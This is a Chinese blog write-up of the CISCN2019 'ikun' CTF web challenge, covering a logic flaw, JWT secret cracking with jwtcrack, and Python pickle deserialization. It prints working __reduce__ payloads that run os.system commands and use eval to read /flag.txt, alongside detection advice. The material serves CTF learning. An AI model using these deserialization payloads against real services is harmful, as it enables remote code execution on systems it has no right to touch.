2021-7-30 [CISCN2019 华北赛区 Day1 Web2]ikun 知识点:逻辑漏洞,JWT伪造,python-pickle反序列化

最新推荐文章于 2023-12-01 21:51:42 发布
最新推荐文章于 2023-12-01 21:51:42 发布
阅读量595 收藏
点赞数 1
分类专栏: webctf 文章标签: python web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/119252907
版权

文章目录

前言

一开始看到kunkun,好家伙,做着做着发现这真是道难题,好你个姬霓太美,太菜了不得不去看大佬wp,才发现是我从未体验过得全新知识点,针不搓呢!!!

前置知识

参考大佬博客:
https://www.cnblogs.com/Cl0ud/p/12177062.html
https://www.cnblogs.com/wangtanzhi/p/12178311.html

一、JWT

JWT解码网站
Json Web Token详解
JWT破解工具
jwtcrack用法:

./jwtcrack+密文
//可以解出秘钥,然后去jwt解码网站可以更改姓名

二、Python-pickle反序列化

python-pickle反序列化讲解
Python魔术方法讲解:

C-pickle反序列化漏洞:

Python中有个库可以实现序列化和反序列化操作,名为pickle或cPickle,作用和PHP的serialize与unserialize一样,两者只是实现的语言不同,一个是纯Python实现、另一个是C实现,函数调用基本相同,但cPickle库的性能更好,因此这里选用cPickle库作为示例。

cPickle可以对任意一种类型的Python对象进行序列化操作。下面是主要的四个函数:

cPickle.dump(obj, file, [,protocol]):将Python对象序列化保存到本地的文件中。

obj:想要序列化的obj对象。 file:文件名称。
protocol:序列化使用的协议。如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。

cPickle.load(file):载入本地文件,将文件内容反序列化为Python对象。

file:文件名称。

cPickle.dumps(obj[, protocol]):将Python对象序列化为字符串。

obj:想要序列化的obj对象。
protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。

cPickle.loads(string):将字符串反序列化为Python对象。

string:文件名称。

【注】 dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力:dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中,随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件,并将该类序列化之后进行URL编码

检测这种反序列化漏洞的方法:

全局搜索Python代码中是否含有关键字类似“import cPickle”或“import
pickle”等,若存在则进一步确认是否调用cPickle.loads()或pickle.loads()且反序列化的参数可控。

魔术方法:
pickle

注意:以下payload都是python2的环境下,去Python3运行之后结果是错误的。。。。。

修改reduce魔术方法的通用模板:

import cPickle
 
class Person(object):
    def __init__(self,username,password):
        self.username = username 
        self.password = password 
 
    def __reduce__(self):
    	# 未导入os模块,通用
    	return (__import__('os').system, ('calc.exe',))
    	# return eval,("__import__('os').system('calc.exe')",)
    	# return map, (__import__('os').system, ('calc.exe',))
    	# return map, (__import__('os').system, ['calc.exe'])
 
    	# 导入os模块
        # return (os.system, ('calc.exe',))
        # return eval, ("os.system('calc.exe')",)
        # return map, (os.system, ('calc.exe',))
        # return map, (os.system, ['calc.exe'])
 
admin = Person('admin','123456')
result = cPickle.dumps(admin)
 
user = cPickle.loads(result)

通用payload:

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))
       #return (eval,("import('os').system('ls')",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a

解题过程

由于大佬们的过程都十分详细了,我就不过多赘述了。
总的就是先写脚本找lv6,
然后替换jwt,
最后python-pickle的__reduce__反序列化漏洞利用。

总结

写完这个题,总的思路和知识点学到了很多,仍有一个不明白的点,就是最后的payload看大哥们都是同一个,直接打开flag.txt获得flag,但是怎么找到flag.txt没写出来payload,难受啊,希望有会的大哥能带带我!!!

Sakura-501
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
是爱坤你就来
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
记 [CISCN2019 华北赛区 Day1 Web2]ikun 关于python反序列化漏洞的思考
fly夏天的博客
03-30 1680
复现平台:buuctf 这题很是复杂,我也是研究了整整一天,发出来供诸位参考参考。 打开题目,脑海里不自觉的就想到了鸡你太美,为了守护世界上最好kunkun,必须搞出这题。 打开页面,是一个类似的商城页面,提示 下面是各种等级的B站账号,显然这题是想要我们购买一个lv6的账号,随便翻卡了几页还是没有看见lv6。 我们来抓包看看 可以通过传page的值来跳到指定页...
docke安装c-jwt-cracker过程,解jwt密钥
tutuwanc的博客
12-01 696
下载出jwtcrack。
[CISCN2019 华北赛区 Day1 Web2]ikun
kukudeshuo的博客
10-23 506
[CISCN2019 华北赛区 Day1 Web2]ikun 首先打开题目地址 左下角有个提示,说ikun们一定要买到lv6,还有爆破的字样 可以看到有很多购买链接,但是发现没翻了几页都没有发现lv6,直接用python写个脚本去寻找 import requests for i in range(1,201): url='http://4dab904b-159f-45a0-bf6a-441fa36b2427.node4.buuoj.cn:81/shop?page='+str(i) re
ctfshow—jwt详解
cosmoslin的博客
09-29 2030
web345(无加密) 进入后F12,发现提示/admin 要注意使用 url 访问网页时 /admin 表示访问 admin.php 文件 /admin/ 表示访问 admin/目录下的文件,默认是 index.php 很像文件夹,所以此处应该访问 /admin/ 查看cookie eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2MzI0OTc1MDksImV4cCI6MTYzMjUwNDcwOSwibmJmIjox
JWT原理及常见攻击方式
weixin_57048716的博客
11-20 1630
JWT分别由标头(Header)、有效载荷(Payload)和签名(Signature)三个部分组成,采用base64url编码进行加密,以.作为连接的字符串形式。 //base64url编码加密是先做base64加密,然后再将+改成-、/改成_,同时也去除末尾额外添加的=字符 例如: 可以在官网上进行解密查看内容:JSON Web Tokens - jwt.io Header header部分承载两部分信息: 一个是typ,表示令牌类型 一个是alg,表示签名所使用的算
windows安装c-jwt-cracker
m0_66574109的博客
03-17 1295
Windows安装c-jwt-cracker.
细说——JWT攻击
LainWith的博客
01-05 5119
JSON Web Token (JWT) 是一种标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户信息的声明,作为身份验证、会话处理和访问控制机制的一部分。与经典会话令牌不同,服务器需要的所有数据都存储在 JWT 本身的客户端中。这使得 JWT 成为高度分布式网站的热门选择,在这些网站中,用户需要与多个后端服务器无缝交互。它一般会放置在、**Cookie**或者请求体里面。
ubuntu/kali安装c-jwt-cracker及使用方法
m0_61025358的博客
12-01 2392
ubuntu/kali安装c-jwt-cracker及使用方法 c-jwt-cracker介绍: c-jwt-cracker是用 C 语言编写的多线程 JWT 暴力破解程序(所以在运行它的时候你的CPU可能会出现100%使用的情况)。
JWTPyCrack.zip
01-17
非常快速的jwt密码破解工具!
SSM-IKUN-图书管理系统
04-15
项目工具:IntelliJ IDEA 2021.2.2 图书后台管理系统,采用SpringBoot+Mybatius+Thymeleaf,页面使用Element框架,使用RESTful API风格编写接口。 数据库使用mysql 已实现功能 基本增删改查,联表查询 拦截器登录...
竞赛资料源码-光电比赛-IKUN队方案.zip
最新发布
01-24
教育部认可的大学生竞赛备赛资料代码,源码,竞赛总结,所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通 全国电子设计大赛、全国大学生智能汽车竞赛、蓝桥杯、集成电路...
Linux系统设计-iKun专属的Linux操作系统
01-10
它继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统,Linux是许多企业和服务提供商的首选操作系统,用于部署Web服务器、数据库服务器、邮件服务器等。Linux系统具有高效的网络功能和稳定的...
[BUU/Pickle/JWT] [CISCN2019 华北赛区 Day1 Web2]ikun
車鈊的博客
03-23 1137
[CISCN2019 华北赛区 Day1 Web2]ikun 能做出这道题的,一定是狂热ikun吧(滑稽 业务逻辑漏洞 import requests url = "http://ed0b4ae6-27c4-46f2-9281-8b0b0335be34.node4.buuoj.cn:81/shop?page=" for i in range(200): if "lv6.png" in requests.get(url+str(i)).text: print(i) 运行结果181
JWT+python反序列化漏洞 [CISCN2019 华北赛区 Day1 Web2]ikun
weixin_45782091的博客
03-22 5170
前面的步骤不是很重要 (主要是这个题太魔性) 主要是一个去找lv6所在页面 import requests url = "http://b9ac92ba-7b09-4b78-9ed8-540734732bff.node4.buuoj.cn:81/shop?page=" i=1 while True: r = requests.get(url + str(i)) if 'lv6.png' in r.text: print (i) break i=i+1
2019 CISCN华北赛区Day1 Web2】ikun
weixin_61951055的博客
11-08 753
2019 CISCN华北赛区Day1 Web2 WriteUp (全国大学生信息安全竞赛)
8-7日刷题
Realiy的博客
08-08 358
[ciscn2019 华北赛区 day1 web2]ikun 知识点逻辑漏洞jwtpython反序列化 这题本来是在buuctf做的,后来buuctf维护,然后就在攻防世界做了 打开题目看到一定要买到lv6,随手翻页,看到如图,那么要找到lv6.png,写个脚本来找快一点。 import requests as res url='http://8110e838-75a9-4a2f-8b80-38b3680ba32c.node3.buuoj.cn/shop?page=' for i
JWTJWT伪造
热门推荐
qq_45521281的博客
05-12 1万+
文章目录JWT简介传统的Session认证基于token的鉴权机制JWT的构成头部(header)载荷(payload)签证(signature)通过JWT 进行认证JWT token破解绕过JWT伪造Bukgu jwt——JWT伪造 JWT简介 Json web token (JWT),是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519)。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被
C:\python\python.py\python.exe: can't open file 'C:\Users\monster\PycharmProjects\pythonProject\ikun.py': [Errno 2] No such file or directory
06-11
这个错误提示说明 Python 解释器找不到你尝试运行的文件。请检查以下几个方面: 1. 文件路径是否正确:请确保文件路径与你代码中写的路径一致。如果你是通过 PyCharm 运行代码,可以在 PyCharm 中打开文件,然后点击右键选择 "Copy Path",将路径复制到代码中。 2. 文件名是否正确:请确保你输入的文件名是正确的。如果你想运行的文件名是 ikun.py,那么请确保你输入的也是这个文件名。 3. 文件是否存在:请检查文件是否存在。如果文件不存在,Python 解释器就会报错。你可以在命令行中输入 `dir` 命令查看当前目录下的文件列表,或者在 PyCharm 中打开文件所在的文件夹,查看文件是否存在。 如果你仍然无法解决问题,请提供更多的代码和错误信息,以便我更好地帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值